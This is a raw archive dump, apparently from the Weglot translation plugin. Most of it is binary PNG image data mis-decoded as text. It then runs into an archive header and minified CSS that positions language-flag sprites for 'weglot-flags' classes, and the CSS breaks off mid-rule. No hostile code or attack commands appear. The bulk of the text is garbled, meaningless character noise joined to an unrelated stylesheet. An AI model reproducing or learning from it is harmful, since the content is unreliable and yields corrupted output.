��Xb�c���n�?����֚�2��ˏ���O�|�RL���j����k�(L%�������40��Q�R,Fr�:Z\�0I�L�e��d��ɗ6��Ri2�
L405��58��[[�����60JH�6_�ϔ��\�.��)}����t��E�+`��L0
8�5��S���2i4����G�������)*��ϵ����_���{�Ju��sk��P���
�~p�G���c�!![


N8NC��)�㡯BKU��+��){ۇ>�U%�~n=Ԋ�Q=-��_��p���Ij�
��ߺ5`|/D��[PURº"VqR,|�ݻ�/E���wIa:�y~]��V|�4q��q�qb��c�~�#�:����1����LQ^
�����E	yL���^Z`�P�50m���n<�Z���8�[0us@�����CE�EeI�"2�����h��&��1v_�,L]vp7�ڼ�[/.`��<�bo^���*�?��bh���<���,��w��Zt�����80�,��&+0<\q��c��s`JB��Ș��+W�Sd�C%׺��0�~j4���(.�9�s�8
A�@�i�5d�*j�8-f���c#rre��c�"��-m��,%�x($n��b��0�w����T|���QA��yIauí[G=g�<�t����r��4�L�M�d��L 0�e9"b�b��d|��ٚS�]��~qH�@���Y�˿��yʍ6i�����6n`*ܗ�_Ӟ�bΝ��r�kw(΍#��!�U|q����#��
��E`�@��P�-�^UJ $/u�@9�R�^�	�a��8{�ON�K��uә䦬�-I����|i�0���Kx�Lh����#rrr`A堜 �;���;<\-�OJJ�ڔ��e��e���%�|�5qYBV���!�0��)d/����PRd�'��=`�h
���L�.��t�����Ӧ��*�oߞ�=^y��hA���R���?%J~5p�{\���x�p����ĩ�L](�dN� HT���A����ҵ_����k�<�)e��S'R�(Li��N*�/�Yӗ~�z)���P~������O�֥���8��=��´�����Zz�>.`��hl��fwZPP�+�i��z�m
���O�]�C�IL�7XB���n)��em�ʶdm��z�����޵��{;����6_z���� �0u�[g�e>y��%0}}��IL������IXŊz	}�ܣt&x)\�b*���$����b+D���՗:Sa*�2�_AL�*8����S+��<�s��F3_0��R�Y|�ѾJ7n����d�`��`�m�n{L�O��({v0<���G�f��)�7����+�س4�|)��(��
�1$L�0�/��,"}�jO�.�h��{o�s"���Oh���e�
LW�ܙ�"L��>�4���x`�a�l;��K��R��:na�)hv�IL��r��P{ԛ�xS���*d>����nu%]žطu�W��/m��ѢhQ�� )A��4��!L�X)u2S��g!P~�����������Q>lB�vŠ���|�K�7˖-��A��'�I��&�J~o]]>=!3:�ƨ����h�����,L�)7<",,"�g�
e����.��7�`���cY��W����~w�7j^�4M6S��b��Z�L������7@3(�~sN��h�~�iH��Ӷ,u�RShE&�ԣ�����(8��,1�Տ`�_1W�_с����/e���-���0�0�����q��b�U$��~��q�a��L2�0��IZ�������%i
���neH/ؾu�O����4������E��h|��Ψ�?�~���x�i�0`��ɞ���?��'���O֮���R1�r���q�Q�:$�%җz�:��߀��a9���S����L7ۓ�-G�n�� �������ʱ��X$`��Xw2'�M�N`*c–�y�N�ܴ����j�&H�]����1S����Y��F-��V{LK�0��j�g|?�r�}J32E���C��zI��7e����$Kң�!�\_��)X���xV\@)�0u�A��Xn�q�܃C���C/J��{�o�=��{�-��LO�|C,0{r��b�g��L���^lL�-Jv��6����8�V�Jk�Z���%^�ҞA)L�Mj��u[�e�����ڨ��@��V���h=�*��/��n`j>u��Q?T�5
��Z
��*��L3Do�"�U|��a�C��7W�@`
���&W�L3�+]t8�CT1i*a��.L/25�D��G"m�?���+
(_jQ����3��<w��9��M�u��8�
�Z��KvQ64D�����M4d�������^�΄�Ƴ�/�B��ł�����Ԥb����&�y��NU�RBW
� ��MY���q<~�٠M�"�
�sbw�(c)$1��?�8�ISb吔l��)cLoT>����4y�_�
r�"]"-05�f��W"_ZYm�7�"LE�6��{�40�/105�m�_ۊ�[[��i������=�,���2	S��(e�������Y3�/�Q�KF:q���K]����|�����4����S��o���%&����D���Sk�P��*��K_�T&4~Ylb:h��T�zLQ�-�hS+�����rS��O��򩀀*�Q`�o[�&_�5	L�f�����=y�d㋍���0��o��z:�m9V%��i
�K	F�4�S���͗uxn��F�C<�Q�Hi����G&�gvF����cXb.30�KYd��6��ٳ�IL������{�w0<�Z�&>��3[f��,ь���Ч��`�Vې겪�'�T�/���H*������2�R�FޒSh��V ��4]����2O�q�/M$LNb)N�´z����V4�z�iA��%�x�ڜx�?9`�&�x+��KLs��=9U�?1[-s���M*�_h#:E���
��~s�f���F
ڌ���lɀ)j}����a)�÷	L}vv2��<�"cYB�7��|0���.��n��H��$B�mJeuۻ��K` �b
3C䁁y���y
�!�%0���$0J���K�p��j�5�~~f���5_��B�"�f��S?����ryj_j�;6aZ�*50�R�ASY�	�5�`miZ�q���w�luf�wRS_��K�/0L
���![Z-�Љ^����%�!)����Q�Q�po&ܑ4îx`*�/u�v:P�f������'ٜp��	�՟��0�+�.OVX̖œ�������0� w�I��6L���Y���=g�=��'{��/���h���,�Sp���V`ʺ��������'[Z��B�VɁ�_	�0�FJ �s�x	0���iBD���	L��/���%e*�)�ٲ�F*K�IK"���8S��݄֧�zߢ}��`�0�k|��p
^/�o�k�ܞT65�w�[�OWL8�뗜�o9�M�겼��8]��7%o޼��_o1\X���k�i�50��,�y
@��4���ﭮ��I��N~�Q:W| 7*8���\���
L#e��0U%7:8*ڥ=54^S�٩���T��mM}��N�C��^Va���K%������~G��[+��w���5���o�	a|�"��H���n�'Ũ�!�rď]})�h��O���$L�^��:���H��F@��xi����o�n��:��w��#�ٙ����TIA�Mzf'�
ݡ��[@N�*


��*��(�-�į@l�&�iu�
�hИ>��,*Q�86�&�hkL��qz2�9�W�{��~��U����B}P�������<�_(������/]Z8?�+D��t�3=��-��K��O��_(��t^Ja��v�d���a�L�=u�R�+�/
��4�6��'�1`Z8�M>0�13ޜ����k�����]�����ڋ1`ʿ~G�[�+u��Na�L��6�C�p��	�c�1`��R�ř���p�;:D��h��޽{7��0���wo�M����d�@��}�����K{_:p�@O���8y��ez��I0�:�'4�{N�p�p`�I�R�r8��/��u��>bH_��t3D�S�8�͡����9��XZI����k(�6���LK*�A'��o_���R|9����\�JLqO��y�}�>�Ӗ�k����;,��0E&_�J���$Li��
@����
�@�� �L�Om�DӶ+��YW�T`*��}i�x�A�S��TW��,27��PQZh��@]��������"�-B`�4�ԉ�X�$�S��Rӽ��N�4_���'�{�&_2`
�K�	Lϒ1�/
�����
v�0=&W+���,���i�	b[y��L��(?���Ls#���$L�mKi`:<�޾��ئ�p;��gMhY�Ӳ��JcaS�l��qշ�E�e����v”���'0u����5:����#�.逩�����?�C���y�w�;T����v&�� F$_Ȕw��L[����
��6f�0��V��c���X{{�����0����߇+?�r=�N2��Y�3�wF*=�z`ݺK���
k��N��4z��H��ӯ�!l�C�����L"`�1�0
-���//r�%���J��x`
|�>^�S�E��@p�7�W����J�>�Bh7�K-`(�O���)��3I���R����r�x,I����[X�L�n�ݝ��_~�����O��/���'�<}![	0�|�w�+�*�ڡ�8������`�9��>�Gm�T`kP�5��3Cx��S��R������+}������]�]`���lT`JNaJ���~~��D�1C4'
��|%5ֶ��"|����^�C��)�>h�~����$��)�/M&0�.��?ly�<W<{|���(�2�R�;��o7��<���L?��-w����3:	�p��ڏc;�=�?V�)S���	���`�7U�vHL_��E�����'`ZI��D��v���>�hH����W}��,�A��jhꭃ0[�%�>��_������}�� ?0�kL�Հ㷦|F`ڌX�̈롻�'X=�I�iܗR��DaJ��ӄ��s��1�焌�7���rRSXó���K����<��J��i}���Z!��p�������DS&^��]^�ѥ�#�\gĘ���#uf�=�#
�ݭ"�_�����1�&y��_�2uMNh�LC˗}�{���!F����b-BS��;Fx��];γg0�8K��M0�9v�f�1��a��ҲiS-����fO�M{�����{�=p�;0�X'0u���u��`�3��3x����R��çsc�)��)])Ý��)S�R�;�t	�4}�Ǘ�Co2�/}�0��;_����%�`�Utݒ�nB`���i?��6h��l���jp�_S0����vX���S&�S&aJ;u���/�����|�SC�s�5�DS���'=�)���5���u���:L$0i��e�c�9�\Yi����(�tF���z%�|e*0]���Z&��l_�hޕ�B�RE��%���h#�K
LG�!s���]
��,��3�3FGRJ�p�`?1��[�H�47�7��y��co�i�S���(a�M��R���pZ�EK�#;0
����ͻ�-�o|)�~h�ܰӪ*`j�R��	���V�
L�m��6��������?g�[�J�֭s���s��Y"��E�2bj�m���'K��baiOa|)^~��N��{T�01���l�o�'��
���ᬥk*+3�i��k\��iA��-/�CE^	���Ro����T�v|����"~�-���L��6�
L?�G�N��*0E[wO�'}C0������?nj����r��ٳ`T�pݞdӉL����� ���It����3�&2/34����ӂ��C��Ç���5w�'��k�#�-��^����_�_��{�;�<N{.�+L��(w��)��R�F[�
<�ӟ<
��]0�cd��觧.���	�b�h՚o���^�<�9�2�_ᄌ5M핕�y�&���nq�����y�M�\`��-��L!|iR�)��ן<����?��)�2�R�ݴ+��o]b�Q�\��t�nθ����ᇇ�"[�ü�z���T�{�E�^`Z�П���9����O�sh��~
�]��j��>
Ojude��O8���`���w�n�����=X���g�L������˻��'�ݚ���p���)�/�Sʗ��~��kN�a��=>
ӟ���J��$�
��44_�L�pYj2U�]B:�i]]��*md[�$��
L�y)�b��sAb�
��Vҙ	҈7tb��_�K��
)�:���??xp���'�K0��9z/-��Ƿ���>�+�����s����F�i�A�1q������Ð�%Q���[��d����h���B�)X�r���, I���.8})��B����ͦ���I|O��ۗ�Xҗ��|uzS����u�L��ń�%���C�/M0}�[��<�ӳ̾T80%S�(0e�t�9��ʙ3gV��˯{>�	1H�Ɨ�K~B�:0�CEӐ/Ք�|)o�5�XL�N�ab��nCa|�P�A���I�Nn_����b��R�.0ݷ����3Հi!��{�OJ+�С��Lk5�����
�Zi�)�Ko�$0�!d̡�/%��DӕY=�0=���Y�ףS�0���)��@x�ۂ�9�-�%��cnҗ��	?_I��+j6W��/fr^KiY�i!�iT���ֲvЫJ��6��rdz������4�D5f�=�[�/p��V0]�su'!���/�����~�\A�����Tr�ܼ:���f���\��ʗ�����V�C8"��s��|�]�f�a�y�N��=����d�4�+m�V"�ww(�0�P�6"��@���4:\�EXK��DY�������Lc��S.^�S�E�zCp�?<囚tkXϯP\ �z��zs&B#�|K�jK;���Z�}�P`z�RL��$E�Z�ot�x^LME�F�0�o�i�l�w?���
[��7t_�ū��ךct|���a���礍=Eu�"����g��3l��4��#�o~��l�S��}m0->'���SR|����\�6�����إPEg��ld87��W؊�lE���j�L��v��P�D�t{*S_�T`�]�~}V�Γw�O@���b�R�������L%`��~�7M���}��`����3`��^�/0�ͥeq`ZXj.�\e���II����ա#o����G�B[6�%���$�LI�N`zr����G�?�n??0-���_��y|h���mF,o0���?�'X!t�.߰G7ϖ��d��4a��%L0�kA��y�D_�L+���K�
K���S0��L�U�����z*��L�x)����/��W:/_��$��W�[- �\KK�#��93�]`�wԕww6 �'��;��}����%�`�֘�L9�0�t����
���[�o�[V��w��]6`�W�	��^��c�(���R�����ͦ>p�����?���7�<�j�k���N?`j�q�R���pЙ"�t��e�L��-[2�X�{]0�@�0�S�c�܊u��[��M����l��Q�O�T��Z����K�D`��	S1�T����e���J7KT~�/݂�K�:�5]�x�
C�4�t��L]ߗ��4nr��^؛�q��?>�aX��
��M���4ސ�B�REӂ؆���]�h`��v�R�*�f�_/�ƄiԗjȀo���`+��$�47���fp!���#�T�}o�����
[e^�f�Jˢvtm+KC�!�1���7[k�5��ڭ�a�#m��0)�Ĕ^�uXLKC,0ų�6��A���zď	LG��r�R���/ at�����e���S�!ۓ������2yM��}N��P�>�'���K�3���R���ǂ�*0E]p�i*-m"��642y��ro�W�7�Ө/��/]��1���&����\�WT�y�X��^ď�E��@��Z9�a���r�x,�$E���nd��h`���nANAAx�!��g
ASR����Ưo��xo������������!��ջ^wҁ)��zM>�>�`(�q���������FgEj�ӕ�ي�h�'��M�m���Z�T�42�B���Slvi���'82M0E���R�Cr��*0%�?s�?M\�s��� ��4r%\}D~�JrRh��͓d/=����f\���E����/���������e`�����3u���A�R���q|��H�I�)�/�
S�a?b�?�a��?}i��Д,����J�J4�iN��q��Wd��)��L�yiv�=�ޭ��6Ĥ뻣�+�
�S]M��uvm[�/�g�պ1IP2��Ŝ>�)�m��7C�'��;!�Ԫsm��іK:��ryf`:��7�}i)p�uUu
7o6�C70��ބS��eq9���՗�L��m6�!�/��<�K���6��7_�v����KLE�N��1�(`��n:ɘ�{��_��/%S�C�o��*�t(c�'�
L�Lɾ�L#Ƅ�8`*}P|�[ȝ0��w�o',���w��:|��R�j�w��A
������2<�����})��o$���T��tOlGF��]�&��:a���UL�"�^0՜�̒i�)oHLAӷv�ܾ�om�!N:0��9�h`�� Mc��f�"��Im7�q�jm$_�
~�2�9Tf`��x���1$1��{a��m�9mJ��!�?�s�p�4�Eӹ�>�@ߪ�@Lu�,u��:���=u�nO�N��;�^%2�S�2��W&�~�Y���	�/LGb��=��K��]�b��4&����7�|O80���O?����G���;�z]��CZ��Z�'��Y��/€�AJ)iK�/���S��x����G�[��޻w?͉%�}����'�46B�tb*��G�T_�S|�v�a�����y'�������TaU�v+�lZG�/��[�8��D�;��6�{��5��#9;F�/��M'`
�K�L�p� w�'�`�����
LLk�/����9�=yg6���+��c]�ƺ#y�5��l���U�.`
�X���?8�z��w>f�
6��D�\�s/MP~�f��}TH�K���D�-^i�)�/�S�����y=͗f��&�lE]E���2��yq�M��/t`��KqVg/o���p�wwv^��'�3�}����{�>��R#��{��3�S��B�[�;!�Tg9۳���sI�����0�G�c/�����b Nk
�.ko�UA��×RL�\ׄ�$�R}�/��ӗr�A�Tc(�1�*0�����&W}�����^E�4�`J}b���ϧ0�g��T�i��)ŗR�)A�6�+
�R|iu��<�bX��V��F`z�w�1v������K9`�U}���Ái�~�wN�(��>e*��Sh_�D`��ӗ2�҄S���0������,��SCD$YI�Ru����tƔ
LK�6�kN4�pPVG>�q���ZM�6�	�6Y&L�g�KR�X>��ɡ�@�6�<��:��t���ib�K��>��t5��.�������`}�.|�~���J�Kz�)�3��x"SA�D_*�ގ���_� Q���T�^a`H��r@�Kh����T�2�ۡt���C.^��@����K��c�Bb�%-�	���G���[S�����<�������86L�; S��=�0��R������a�b.XB������Uu�k�:��{~r�#��NԼ��9�y�����]��B}ijSH_�d`��6��祘T��SN_J~X�	���g��u
/]��6�������<��'ӂ4.�c�#��N!`z�ٺÇ����ɑ��=��s>.��{��<>�X�
��8G�y��[�.ʗj���� �iGx���ӗ��)jp1��zd��C��t!�r:�V^޴9oA6`�Tx��
L�y):��N\y�
���_�%�
^ߗ���~'����9v#��g"SNo�L�ݔ���W€�=y����1z��SN_JyX0��	�T�Ku��
��iL�(2/��4i��fN���4_J���!���L+#�.'���Ke�rG�Ӹ/��R*0�S��-z$_����_���_�ڌ�I�t�����g�S/��v�����t���B^"��t�]��(��R���_+&�/eӥ���`hC^az8���A�/L�$�5�|{�
L%�`�i���3����6��|q�4���t��d3�/]DŽ6e�[Y�������G�b�i	b�0EmO#��yG���0�OA����t���$��e�����7�?A���v�/%�*0w�O�.�Y�nZ��!_
�KU`*0��(��t�L�B�i%��ǢKZ�N4�'A�Fn%�F"V�*�n�Ⱦ��Db*��G�t_�Ӱ�1�p�g��N}`�A��4|�Hw2}O{S�T�NI�rr��ׯ��+!0ݮt`
�K�
L�ڍ��#q�C0��'��4a���?0x�\>yt��/���Z\.`ZYXXF�����&�i��^U[W[e/�`7�$��u�n��s)�t���?{6�y>��ztw�ܸ᷇�4�s�w��?oF,oY��=�Q^ʞ!���})I��vQ�g��:����ϗ"Sۉۉ�.��\�tc��
���R��j(�l�#�Z;����T0�0�|Š1tcZ�#M�)��[z.�e0������R
�B�R����ד�`��K�OLy|)�	���\z�i������:0�9�\`J��d`J~T#����	��F�g�B��Li��L��Ti���NA�R��m(���RmL�x=�/��0�N���AL��aA�4�L�X�@�
�3�ͣc�K9tiB3����\I\���Me`����T,0-�Y�M�v��L�Si'8d�x�R_)cZ�%������ޜ�Z�����Z�Ra��W��Tl}�S&`:7�ؘ>�����_��'�D���:��~��,���K�ǧqJp��Ec{�_p��T�'��|��喀��s�s$/U��,��T��!���\�B��AJiK�U�D
�}�h�VҀ)�����}T`
$��T�� L|�
L�(��?���
�����4{Ӕ�`���zQ�43�B���S-�%p������&�b|?����쥣��?�^+0u}�20�����,�'��6~||��CK#���C3����Wߜ°��_�b����x����e!��R�R��NS��R ��R�0U*0}.!��ח"SS�	sQ���|��$0�$��B���4;���>�:RUig[�ㆰ.m����P2��q{�����5��V9�����w��i�����ѹ�P�)�7`�/�0��ya�����kt�*��R�SЁ)�/%=ї��ö���(�iL
�[�T��S��Pn`��K)����f��'ES��c��R�J��i��)͗ҁ)A���)��ڱG|ts�d��M�)W�0ն̹����
�nS_�@`��7���/�֥	���0�437���9�_*��KC����R��L���y6���9<9	��fg��	L��^G�{�ˣ�4�S�SS�iL��ѐ$ͨ�>�~ط���?A�����9��E����ߥ0m��x��a�n�n���/�����"�
L����.yld��R!����uIJ�in�띛�(JL���S�����Ƅ)�/U�i,lX�3�w���S�ڐ�Y�Ӝ��I�M+`
�KL8Ё)�/%<I�	�ڎ���W�Z��*0��:��g�8��;|���s���X���wϝ��͈�-�|�ėֆT^g@,0u�R�0U*0�Ma*�/En_�n���m���[e2ӧb�/x`
�K��u6��ɒ[/��ŤT�v��Va���[M}�<�[ZS��;!������@�\�J�i����å`
�K���B�R�}��������505�[�P�ijS��b�/�S�0�mG�>�\`Z��X�*�&��艹�K�iD�V�OS,0���
C ����
*0�%1��۽'�Z�~y�S$_�<`z_��/�ե	����S�j��/
Lc��T`��t6�q�|��<����|��K��<c�:U�ij�B����ց��`z@H��tꗆ�h��rЩ�u� �R����0	S�ʱ�צ�8Bį7��$�B���wM��T��4��]F������T0�) ��E�Ġ�SS�@���*Q_H0��]���F�)s��؈��ҟi�Nw`:͚�4���m����0E�*0�_��qa���S��#���f0���J|;L��8'��w�.>�����X����e!��$9�"��S�=+
��ʗƅ�b��sr���})r�R2_���ظ0]8_"0ݘ)0������D���WL;&S����e�NX�Ȕ�C�t`��KS����=J�P�� LQ�)�/%<
ї���X=�qO���	LU`�b����2�R0%S�4����&���c��T`�t`J��L�� L�
L!})�԰{�
��G��W�ԚY-¿8�)�/U0��
�/�ѥ��aa�����,e{�Li�Ӵ���b��w��g1�(�z\�Y&�ЦL`�
(�
�
{?ީ�o�d0�'�=�g��~9_D�ї
�|�4�6P��,8�}I�-�j�|�</U���Թ�MDF�t"S�����6]2�vB��&�Z���!b*I��,M�
L#Q���?�Uv�S<��

��
0Y�^ߓ+50ݮd`��KU`���4&LU`����v9$�Y��b�T��t�ٳݙ����#ܗNM��͈�-�|�Ɨj�U�bZ�(`
�Kc�T��2��̾�}Y�.뚿uk��6� 0�$����`
�K�^4����C6���i�N0�:B��au��w�q	5�M}`���3�Z�F�22��Ҹ0E�p�4^�}i�<��I_����"�
L���|)�ƅ)�>��<�`�>i;�qH�*�&�⾴)�K�)�0U0=��T���N�N_�
L��T���Tq���c�K!u�€iH�Ku`j���Q��
L�����:��pҗ���՛�4`J^}���^�����a�2����\z�}B��$c���?A�€��z�b��L۬V֛�[���K�y�
L��[2/��L���Kс�1J1�R�B��*��H40�T�^��l�@��4]Ml���l��)L�W'0]��)җ�ZS$_�S����Qa��UL��T��t`��ܽFT����e!��R�RmmCg����`
�K��T���99����})�7T�wu���e�Oŝ�0�����>5~�9P���!�� `j1�W�:��L��)L�^^0�,V����Q0��bmL�'��2����0V]_�������[*0Mo`J���4&L��ڟL��Cr.P��4��L��4"L�
�#���j)rF��O�*0��~o�00
����R�S L��805K�ި�T�����N��P�끭��S����L�
L���My�����w��\~NKS?sӃP�UX���T�-���~^�SɁ���62ӵ�gT`�S@.�
L%�rS���o�-Q}�*����z�1�����Y��ǹ�iL�|�
L���|iD���T��LE�ϛ�b�W�|����z�S8_���p)Le����K�t��]����erӍ���~`��K�o�4�1���v�q�.�cDO��,�6���Щ���d��Y�t+̙�U805Ü�f�җ���᝚n�J(�i�-��*0M60�Z�Y€)ŗ2Ө0EkM�*�;�ɺ@���S�/e�l�T�ޗj+���_�S4�J�*0%�~o�20���aQ�yr�����f�����u#R���tӓ�m��ǡ�qld�ɼ`�Z>�D���+ӫ�t�`�?�WК������sZ����DبX�)L'����JL�[�g�
L��-�5W��?|��AJ�hK�Ҁ�U±���)k�g�Kb��5���E��B�DSw5=�6��N[�U`
bzz�S�4��)�/U�)��/M�0U��
LW0E��T{O�5����)�/
S��B��>�/En_�
]����F9��&��0E㥲����y�s�
���ߡ�7�m�K�/VHL�#b(
��1D�L%ӭp��V���w*�	�_X_���#�㝂�s��lܺT����!�R})#0�S�����]ЫIEND�B`�weglot-widget/build/index.css000064400000145643151330373270012267 0ustar00.weglot-flags.hw>a:before,.weglot-flags.hw>span:before{background-position:-3570px 0!important}.weglot-flags.af>a:before,.weglot-flags.af>span:before{background-position:-6570px 0!important}.weglot-flags.fl>a:before,.weglot-flags.fl>span:before{background-position:-3060px 0!important}.weglot-flags.sq>a:before,.weglot-flags.sq>span:before{background-position:-2580px 0!important}.weglot-flags.am>a:before,.weglot-flags.am>span:before{background-position:-5130px 0!important}.weglot-flags.ar>a:before,.weglot-flags.ar>span:before{background-position:-510px 0!important}.weglot-flags.hy>a:before,.weglot-flags.hy>span:before{background-position:-1800px 0!important}.weglot-flags.az>a:before,.weglot-flags.az>span:before{background-position:-6840px 0!important}.weglot-flags.ba>a:before,.weglot-flags.ba>span:before{background-position:-2040px 0!important}.weglot-flags.eu>a:before,.weglot-flags.eu>span:before{background-position:-7260px 0!important}.weglot-flags.be>a:before,.weglot-flags.be>span:before{background-position:-5310px 0!important}.weglot-flags.bn>a:before,.weglot-flags.bn>span:before{background-position:-5400px 0!important}.weglot-flags.bs>a:before,.weglot-flags.bs>span:before{background-position:-6390px 0!important}.weglot-flags.bg>a:before,.weglot-flags.bg>span:before{background-position:-2730px 0!important}.weglot-flags.br>a:before,.weglot-flags.br>span:before{background-position:-6630px 0!important}.weglot-flags.my>a:before,.weglot-flags.my>span:before{background-position:-3299px 0!important}.weglot-flags.ca>a:before,.weglot-flags.ca>span:before{background-position:-7230px 0!important}.weglot-flags.zh>a:before,.weglot-flags.zh>span:before{background-position:-3690px 0!important}.weglot-flags.tw>a:before,.weglot-flags.tw>span:before{background-position:-2970px 0!important}.weglot-flags.km>a:before,.weglot-flags.km>span:before{background-position:-6930px 0!important}.weglot-flags.ny>a:before,.weglot-flags.ny>span:before{background-position:-1140px 0!important}.weglot-flags.co>a:before,.weglot-flags.co>span:before{background-position:-2520px 0!important}.weglot-flags.hr>a:before,.weglot-flags.hr>span:before{background-position:-5910px 0!important}.weglot-flags.cs>a:before,.weglot-flags.cs>span:before{background-position:-2700px 0!important}.weglot-flags.da>a:before,.weglot-flags.da>span:before{background-position:-2670px 0!important}.weglot-flags.nl>a:before,.weglot-flags.nl>span:before{background-position:-2100px 0!important}.weglot-flags.en>a:before,.weglot-flags.en>span:before,.weglot-flags.eo>a:before,.weglot-flags.eo>span:before{background-position:-1920px 0!important}.weglot-flags.et>a:before,.weglot-flags.et>span:before{background-position:-2640px 0!important}.weglot-flags.fj>a:before,.weglot-flags.fj>span:before{background-position:-1710px 0!important}.weglot-flags.fi>a:before,.weglot-flags.fi>span:before{background-position:-2550px 0!important}.weglot-flags.fr>a:before,.weglot-flags.fr>span:before{background-position:-2520px 0!important}.weglot-flags.gl>a:before,.weglot-flags.gl>span:before{background-position:-7290px 0!important}.weglot-flags.ka>a:before,.weglot-flags.ka>span:before{background-position:-5040px 0!important}.weglot-flags.de>a:before,.weglot-flags.de>span:before{background-position:-2490px 0!important}.weglot-flags.el>a:before,.weglot-flags.el>span:before{background-position:-2460px 0!important}.weglot-flags.gu>a:before,.weglot-flags.gu>span:before{background-position:-1170px 0!important}.weglot-flags.ht>a:before,.weglot-flags.ht>span:before{background-position:-4650px 0!important}.weglot-flags.ha>a:before,.weglot-flags.ha>span:before{background-position:-900px 0!important}.weglot-flags.he>a:before,.weglot-flags.he>span:before{background-position:-1050px 0!important}.weglot-flags.hi>a:before,.weglot-flags.hi>span:before{background-position:-1170px 0!important}.weglot-flags.hu>a:before,.weglot-flags.hu>span:before{background-position:-2430px 0!important}.weglot-flags.is>a:before,.weglot-flags.is>span:before{background-position:-2400px 0!important}.weglot-flags.ig>a:before,.weglot-flags.ig>span:before{background-position:-870px 0!important}.weglot-flags.id>a:before,.weglot-flags.id>span:before{background-position:-3510px 0!important}.weglot-flags.ga>a:before,.weglot-flags.ga>span:before{background-position:-2340px 0!important}.weglot-flags.it>a:before,.weglot-flags.it>span:before{background-position:-2310px 0!important}.weglot-flags.ja>a:before,.weglot-flags.ja>span:before{background-position:-3480px 0!important}.weglot-flags.jv>a:before,.weglot-flags.jv>span:before{background-position:-3360px 0!important}.weglot-flags.kn>a:before,.weglot-flags.kn>span:before{background-position:-1170px 0!important}.weglot-flags.kk>a:before,.weglot-flags.kk>span:before{background-position:-3150px 0!important}.weglot-flags.ko>a:before,.weglot-flags.ko>span:before{background-position:-6990px 0!important}.weglot-flags.ku>a:before,.weglot-flags.ku>span:before{background-position:-2430px 0!important}.weglot-flags.ky>a:before,.weglot-flags.ky>span:before{background-position:-3420px 0!important}.weglot-flags.lo>a:before,.weglot-flags.lo>span:before{background-position:-3450px 0!important}.weglot-flags.la>a:before,.weglot-flags.la>span:before{background-position:-2310px 0!important}.weglot-flags.lv>a:before,.weglot-flags.lv>span:before{background-position:-2280px 0!important}.weglot-flags.lt>a:before,.weglot-flags.lt>span:before{background-position:-2250px 0!important}.weglot-flags.lb>a:before,.weglot-flags.lb>span:before{background-position:-2220px 0!important}.weglot-flags.mk>a:before,.weglot-flags.mk>span:before{background-position:-2190px 0!important}.weglot-flags.mg>a:before,.weglot-flags.mg>span:before{background-position:-1200px 0!important}.weglot-flags.ms>a:before,.weglot-flags.ms>span:before{background-position:-3360px 0!important}.weglot-flags.ml>a:before,.weglot-flags.ml>span:before{background-position:-1170px 0!important}.weglot-flags.mt>a:before,.weglot-flags.mt>span:before{background-position:-2130px 0!important}.weglot-flags.mi>a:before,.weglot-flags.mi>span:before{background-position:-3240px 0!important}.weglot-flags.mr>a:before,.weglot-flags.mr>span:before{background-position:-1170px 0!important}.weglot-flags.mn>a:before,.weglot-flags.mn>span:before{background-position:-6000px 0!important}.weglot-flags.ne>a:before,.weglot-flags.ne>span:before{background-position:-3270px 0!important}.weglot-flags.no>a:before,.weglot-flags.no>span:before{background-position:-5850px 0!important}.weglot-flags.ps>a:before,.weglot-flags.ps>span:before{background-position:-5189px 0!important}.weglot-flags.fa>a:before,.weglot-flags.fa>span:before{background-position:-6690px 0!important}.weglot-flags.pl>a:before,.weglot-flags.pl>span:before{background-position:-2160px 0!important}.weglot-flags.pt>a:before,.weglot-flags.pt>span:before{background-position:-1740px 0!important}.weglot-flags.pa>a:before,.weglot-flags.pa>span:before{background-position:-3180px 0!important}.weglot-flags.ro>a:before,.weglot-flags.ro>span:before{background-position:-2070px 0!important}.weglot-flags.ru>a:before,.weglot-flags.ru>span:before{background-position:-2040px 0!important}.weglot-flags.sm>a:before,.weglot-flags.sm>span:before{background-position:-4620px 0!important}.weglot-flags.gd>a:before,.weglot-flags.gd>span:before{background-position:-30px 0!important}.weglot-flags.sr>a:before,.weglot-flags.sr>span:before{background-position:-4290px 0!important}.weglot-flags.sn>a:before,.weglot-flags.sn>span:before{background-position:-540px 0!important}.weglot-flags.sd>a:before,.weglot-flags.sd>span:before{background-position:-3180px 0!important}.weglot-flags.si>a:before,.weglot-flags.si>span:before{background-position:-2820px 0!important}.weglot-flags.sk>a:before,.weglot-flags.sk>span:before{background-position:-6810px 0!important}.weglot-flags.sl>a:before,.weglot-flags.sl>span:before{background-position:-2010px 0!important}.weglot-flags.so>a:before,.weglot-flags.so>span:before{background-position:-4560px 0!important}.weglot-flags.st>a:before,.weglot-flags.st>span:before{background-position:-4830px 0!important}.weglot-flags.es>a:before,.weglot-flags.es>span:before{background-position:-480px 0!important}.weglot-flags.su>a:before,.weglot-flags.su>span:before{background-position:-4530px 0!important}.weglot-flags.sw>a:before,.weglot-flags.sw>span:before{background-position:-1290px 0!important}.weglot-flags.sv>a:before,.weglot-flags.sv>span:before{background-position:-1980px 0!important}.weglot-flags.tl>a:before,.weglot-flags.tl>span:before{background-position:-3060px 0!important}.weglot-flags.ty>a:before,.weglot-flags.ty>span:before{background-position:-6270px 0!important}.weglot-flags.tg>a:before,.weglot-flags.tg>span:before{background-position:-2940px 0!important}.weglot-flags.ta>a:before,.weglot-flags.ta>span:before{background-position:-1170px 0!important}.weglot-flags.tt>a:before,.weglot-flags.tt>span:before{background-position:-2040px 0!important}.weglot-flags.te>a:before,.weglot-flags.te>span:before{background-position:-1170px 0!important}.weglot-flags.th>a:before,.weglot-flags.th>span:before{background-position:-2910px 0!important}.weglot-flags.to>a:before,.weglot-flags.to>span:before{background-position:-6540px 0!important}.weglot-flags.tr>a:before,.weglot-flags.tr>span:before{background-position:-1950px 0!important}.weglot-flags.uk>a:before,.weglot-flags.uk>span:before{background-position:-1890px 0!important}.weglot-flags.ur>a:before,.weglot-flags.ur>span:before{background-position:-3180px 0!important}.weglot-flags.uz>a:before,.weglot-flags.uz>span:before{background-position:-2880px 0!important}.weglot-flags.vi>a:before,.weglot-flags.vi>span:before{background-position:-2850px 0!important}.weglot-flags.cy>a:before,.weglot-flags.cy>span:before{background-position:-6420px 0!important}.weglot-flags.fy>a:before,.weglot-flags.fy>span:before{background-position:-2100px 0!important}.weglot-flags.xh>a:before,.weglot-flags.xh>span:before{background-position:-6570px 0!important}.weglot-flags.yi>a:before,.weglot-flags.yi>span:before{background-position:-1050px 0!important}.weglot-flags.yo>a:before,.weglot-flags.yo>span:before{background-position:-870px 0!important}.weglot-flags.zu>a:before,.weglot-flags.zu>span:before{background-position:-6570px 